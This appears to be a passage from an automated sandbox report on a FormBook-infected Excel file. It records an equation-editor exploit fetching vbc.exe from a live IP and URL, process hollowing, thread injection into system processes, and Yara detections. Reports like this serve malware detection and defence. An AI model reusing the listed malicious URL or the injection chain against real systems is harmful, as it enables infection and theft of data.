Source: C:\Users\user\Esfjmbxd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: B0000 Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: A0000 Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A40000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 80000 Jump to behavior
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 90000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 80000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 90000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: A0000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: B0000 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 1764 Jump to behavior
Contains functionality to inject threads in other processes
Source: C:\Users\Public\vbc.exe Code function: 4_2_0430459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 4_2_0430459C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A3459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 8_2_03A3459C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C2459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 11_2_03C2459C
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405984
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_004062CC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_0040CAF8
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B4DC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B528
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405A8F
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_042F589C
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042FA694
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042FA6E0
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042F61B4
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_042F59A7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_042FBB5C
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003D57EC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003D6104
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003DA484
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003D58F6
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003DB900
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_00405984
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_004062CC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 8_2_0040CAF8
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_0040B4DC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_0040B528
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_00405A8F
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_03A2589C
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A261B4
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A2A694
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A2A6E0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 8_2_03A2BB5C
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_03A259A7
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_01D657EC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D66104
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D6A484
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D6B900
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_01D658F6
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_00405984
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_004062CC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 11_2_0040CAF8
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_0040B4DC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_0040B528
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_00405A8F
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_03C1589C
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C161B4
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C1A6E0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C1A694
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 11_2_03C1BB5C
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_03C159A7
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_003D57EC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003D6104
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003DA484
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_003D58F6
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003DB900
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409F7C GetLocalTime, 4_2_00409F7C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C GetVersion, 4_2_0043DD6C

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 532860 Sample: 4514808437.xlsx Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 71 Malicious sample detected (through community Yara rule) 2->71 73 Antivirus detection for URL or domain 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 11 other signatures 2->77 10 EQNEDT32.EXE 11 2->10         started        15 EXCEL.EXE 33 31 2->15         started        process3 dnsIp4 57 198.46.136.201, 49167, 80 AS-COLOCROSSINGUS United States 10->57 45 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->45 dropped 47 C:\Users\Public\vbc.exe, PE32 10->47 dropped 103 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->103 17 vbc.exe 1 15 10->17         started        49 C:\Users\user\Desktop\~$4514808437.xlsx, data 15->49 dropped file5 signatures6 process7 dnsIp8 51 onedrive.live.com 17->51 53 kq7x1q.am.files.1drv.com 17->53 55 am-files.fe.1drv.com 17->55 43 C:\Users\usersfjmbxd.exe, PE32 17->43 dropped 79 Multi AV Scanner detection for dropped file 17->79 81 Machine Learning detection for dropped file 17->81 83 Contains functionality to inject threads in other processes 17->83 85 7 other signatures 17->85 22 logagent.exe 17->22         started        file9 signatures10 process11 signatures12 87 Modifies the context of a thread in another process (thread injection) 22->87 89 Maps a DLL or memory area into another process 22->89 91 Sample uses process hollowing technique 22->91 93 2 other signatures 22->93 25 explorer.exe 1 2 22->25 injected process13 signatures14 101 Uses ipconfig to lookup or modify the Windows network settings 25->101 28 Esfjmbxd.exe 13 25->28         started        32 Esfjmbxd.exe 15 25->32         started        34 cmstp.exe 25->34         started        36 ipconfig.exe 25->36         started        process15 dnsIp16 59 onedrive.live.com 28->59 61 kq7x1q.am.files.1drv.com 28->61 63 am-files.fe.1drv.com 28->63 105 Multi AV Scanner detection for dropped file 28->105 107 Machine Learning detection for dropped file 28->107 109 Contains functionality to inject threads in other processes 28->109 123 2 other signatures 28->123 38 logagent.exe 28->38         started        65 onedrive.live.com 32->65 67 kq7x1q.am.files.1drv.com 32->67 69 am-files.fe.1drv.com 32->69 111 Writes to foreign memory regions 32->111 113 Allocates memory in foreign processes 32->113 115 Creates a thread in another existing process (thread injection) 32->115 41 logagent.exe 32->41         started        117 Modifies the context of a thread in another process (thread injection) 34->117 119 Maps a DLL or memory area into another process 34->119 121 Tries to detect virtualization through RDTSC time measurements 34->121 signatures17 process18 signatures19 95 Modifies the context of a thread in another process (thread injection) 38->95 97 Maps a DLL or memory area into another process 38->97 99 Sample uses process hollowing technique 38->99
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.46.136.201
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
kq7x1q.am.files.1drv.com unknown unknown
onedrive.live.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://198.46.136.201/1100/vbc.exe true
  • Avira URL Cloud: malware
 unknown